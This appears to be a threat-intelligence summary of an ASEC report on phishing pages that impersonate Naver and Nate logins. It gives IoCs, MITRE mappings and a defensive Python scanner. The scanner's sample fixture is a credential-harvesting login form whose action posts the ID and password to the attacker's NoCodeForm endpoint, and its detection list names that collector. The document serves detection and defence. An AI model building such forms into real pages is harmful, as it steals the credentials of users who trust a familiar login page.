Phishing Scam Masquerading as Korean Portal Login Page

ASEC reported phishing HTML files impersonating Korean portal login pages (notably Naver and Nate) that reuse the legitimate sites' source code to harvest credentials and pre-fill the victim's email address. The attackers modified the login form handlers so that submitted IDs and passwords are sent to NoCodeForm endpoints, enabling exfiltration via email or Slack; AhnLab detects the files as Phishing/HTML.FakeLogin. #NoCodeForm #Naver

Keypoints

  • ASEC identified phishing HTML files mimicking Korean portal login pages, including Naver and Nate.
  • Threat actors used the actual source code of legitimate sites, altering form behavior to capture credentials.
  • Email addresses were pre-filled in the ID input to increase user trust and likelihood of credential entry.
  • Exfiltration was implemented via the NoCodeForm service by replacing the form’s onsubmit handler with an action URL targeting attacker-controlled NoCodeForm form-ids.
  • Collected credentials could be delivered to the attacker via NoCodeForm’s default form results or forwarded to email/Slack.
  • Examples include a distributed file named “doc003.shtml” and AhnLab detections Phishing/HTML.FakeLogin.SC199025 and SC199026.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The attack used HTML attachments that impersonate legitimate login pages to capture credentials (“the phishing HTML page distributed with the file name ‘doc003.shtml’”)
  • [T1566.002] Spearphishing Link – Personalized content increased effectiveness by pre-filling recipient emails in the login form (“the ID of the phishing email recipient is already filled out”)
  • [T1036] Masquerading – The adversary replicated legitimate site source code to make fake pages almost indistinguishable from the original (“the threat actor using the actual source code of the normal website to modify the address and method for sending ID and password”)
  • [T1567] Exfiltration Over Web Service – Credentials were redirected to NoCodeForm endpoints by modifying form handlers to use the service’s form-id as the action, enabling collection and forwarding via email/Slack (“the threat actor changed the onsubmit event handler … utilized the NoCodeForm form-id as an address to deliver the exfiltrated account credentials.”)

Indicators of Compromise

  • [URLs] Exfiltration endpoints used by attacker – hxxps://nocodeform[.]io/f/6612aaccf9a3a01ba8f6d979, hxxps://nocodeform[.]io/f/6605717e7bf0d35064f45348
  • [File name] Phishing HTML file distributed as an email attachment – doc003.shtml
  • [Detection names] AhnLab detections for these phishing pages – Phishing/HTML.FakeLogin.SC199025, Phishing/HTML.FakeLogin.SC199026

ASEC observed threat actors creating near-identical copies of Korean portal login pages (notably Naver and Nate) by copying the original HTML/CSS and modifying only the login form’s submission logic. The email recipient’s address was programmatically injected into the ID input field, increasing the page’s perceived legitimacy and encouraging victims to enter their passwords.

Technically, the actors replaced the page’s normal onsubmit handler with an action URL pointing to a NoCodeForm form-id, so submitted credentials are POSTed to NoCodeForm endpoints under attacker control. NoCodeForm then delivers collected form results via the service’s default mechanism or forwards them to attacker-specified email or Slack destinations, enabling straightforward credential exfiltration without hosting a custom backend.
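The two traits described above (a login form whose action posts to a hosted form-collection service, and a password form that arrives with an email address already filled in) can both be checked statically in an HTML attachment before a user ever opens it. The following scanner is an added example for this summary, not ASEC's or AhnLab's code: it uses only the Python standard library, the collector domain comes from the IoC list above, and the two sample documents are constructed stand-ins (the "clean" one posts to a placeholder login.example.com host).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosted form-collection services whose use inside a login page is suspicious.
# nocodeform.io is taken from the report's IoCs; any further entries are an
# assumption you tune for your own environment.
FORM_COLLECTOR_DOMAINS = {"nocodeform.io"}

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class _FormCollector(HTMLParser):
    """Collect every <form> with its action, onsubmit and child <input> tags."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # boolean attributes arrive with value None
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "onsubmit": a.get("onsubmit") or "",
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def refang(url):
    """Turn defanged IoC notation (hxxps://, [.]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def _is_collector(host):
    return host in FORM_COLLECTOR_DOMAINS or any(
        host.endswith("." + d) for d in FORM_COLLECTOR_DOMAINS
    )


def scan_html(html):
    """Return one finding per form that matches the FakeLogin pattern.

    A finding lists the form action and the reasons it was flagged:
    - the action posts to a known third-party form collector, and/or
    - a password form carries an input pre-filled with an email address.
    """
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(refang(form["action"])).hostname or "").lower()
        reasons = []
        if _is_collector(host):
            reasons.append(f"form action posts to third-party collector {host}")
        has_password = any(
            (i.get("type") or "").lower() == "password" for i in form["inputs"]
        )
        prefilled = [
            i["value"] for i in form["inputs"]
            if i.get("value") and EMAIL_RE.match(i["value"])
        ]
        if has_password and prefilled:
            reasons.append(f"password form pre-filled with email {prefilled[0]}")
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


# Constructed sample: a minimal stand-in for a copied login page whose form
# action now points at the collector URL from the report's IoC list.
SAMPLE_PHISH = """
<form id="login" method="post"
      action="https://nocodeform.io/f/6612aaccf9a3a01ba8f6d979">
  <input type="text" name="id" value="victim@example.com">
  <input type="password" name="pw">
  <input type="submit" value="Login">
</form>
"""

# Constructed sample: the same form posting to a placeholder first-party host
# with an empty ID field, which should produce no findings.
SAMPLE_CLEAN = """
<form id="login" method="post" action="https://login.example.com/authenticate">
  <input type="text" name="id" value="">
  <input type="password" name="pw">
  <input type="submit" value="Login">
</form>
"""

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(doc))
```

Run against a mail gateway's quarantined .html/.shtml attachments, a single collector hit on a form that also contains a password field is a strong signal on its own; the pre-filled-email check is the secondary indicator, since legitimate pages rarely ship with a recipient-specific address baked into the markup.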

Indicators include the distributed HTML file (doc003.shtml), the NoCodeForm URLs listed above, and the AhnLab detection names Phishing/HTML.FakeLogin.SC199025 and SC199026. Mitigations include never logging in through a page opened from an email attachment, checking the URL before entering credentials, and rotating passwords immediately if credentials were entered on a suspect page.

Read more: https://asec.ahnlab.com/en/64294/